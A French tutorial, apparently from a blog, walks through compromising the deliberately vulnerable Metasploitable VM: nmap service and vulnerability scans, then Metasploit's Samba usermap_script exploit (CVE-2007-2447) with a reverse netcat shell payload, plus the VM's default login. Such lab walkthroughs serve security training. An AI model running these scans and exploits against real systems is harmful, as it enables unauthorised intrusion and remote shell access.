Metasploitable est une machine virtuelle Linux intentionnellement vulnérable. Cette VM peut être utilisée pour mener une formation à la sécurité, tester des outils de sécurité et pratiquer des techniques communes de test de pénétration. L’identifiant et le mot de passe par défaut sont msfadmin:msfadmin.

  Recherche des services

Nmap (« Network Mapper ») est un utilitaire pour la découverte de réseaux et l’audit de sécurité. C’est donc lui que nous utiliserons pour rechercher les ports ouverts, les services et les versions des services rattachées à ces ports. Pour chercher les ports ouverts, les services ainsi que les versions nous tapons nmap -sV @ip

Après avoir découvert les services rattachées à ces ports, nous pouvons lancer un scan de vulnérabilité via cette commande nmap -sV -v -A --script=vuln @ip

-v= la verbeuse sert à afficher plus de détails sur le processus de scan en cours.

-A= effectue un scan intensif et fournit un maximum d’infos utiles

–script=vuln= permet de lancer un scan de vulnérabilités en utilisant des scripts spécifiques du NSE (Nmap Scripting Engine) qui recherchent des failles de sécurité connues sur la cible.

Après l’exécution de cette commande nous apercevons différents résultats dont le statut de la version des services(vulnérable ou non),les CVE ainsi que  la technique du scan utilisée dont Le SYN Stealth Scan ou scan furtif  qui est une technique de scan de ports dans Nmap utilisée pour détecter les ports ouverts sans établir de connexion complète.

une fois cette étape terminée nous pouvons utiliser Metasploit Framework  qui permet pour tester la sécurité des systèmes en exploitant des vulnérabilités connues. Il est principalement utilisé en pentesting et en recherche de failles.En regardant en arrière sur les résultats de l’analyse, un port particulier attrape mon œil, Port 445 fonctionnant sous Samba 3.0.20. Après ce scan, j’ai trouvé une vulnérabilité (CVE 2007-2447), nous allons donc ouvrir metasploit et taper search CVE 2007-2447

on tape use exploit/multi/samba/usermap_script pour charger cet exploit

on tape set payload cmd/unix/reverse_netcat car un payload est recommandé  ici; vous remarquerez que le payload est chargé

Après cela nous tapons show options pour voir les options obligatoires que nous devons renseignées; ce cas ci nous devons  renseigner que l’adresse ip de la cible(RHOSTS) donc on tape set RHOSTS + @ip de la cible ; après avoir renseigné ces information nous tapon run ou exploit  et si tout a été bien configuré vous aurez la même chose que cette image

Si vous avez cette même image c’est chouette car vous avez piraté la machine et vous pouvez maintenant taper des commandes Linux

 

 

 

Post Your Comment

Abonnez-vous à notre newsletter

En vous abonnant à notre newsletter, vous serez toujours informé des dernières actualités, offres exclusives et conseils personnalisés, directement dans votre boîte de réception.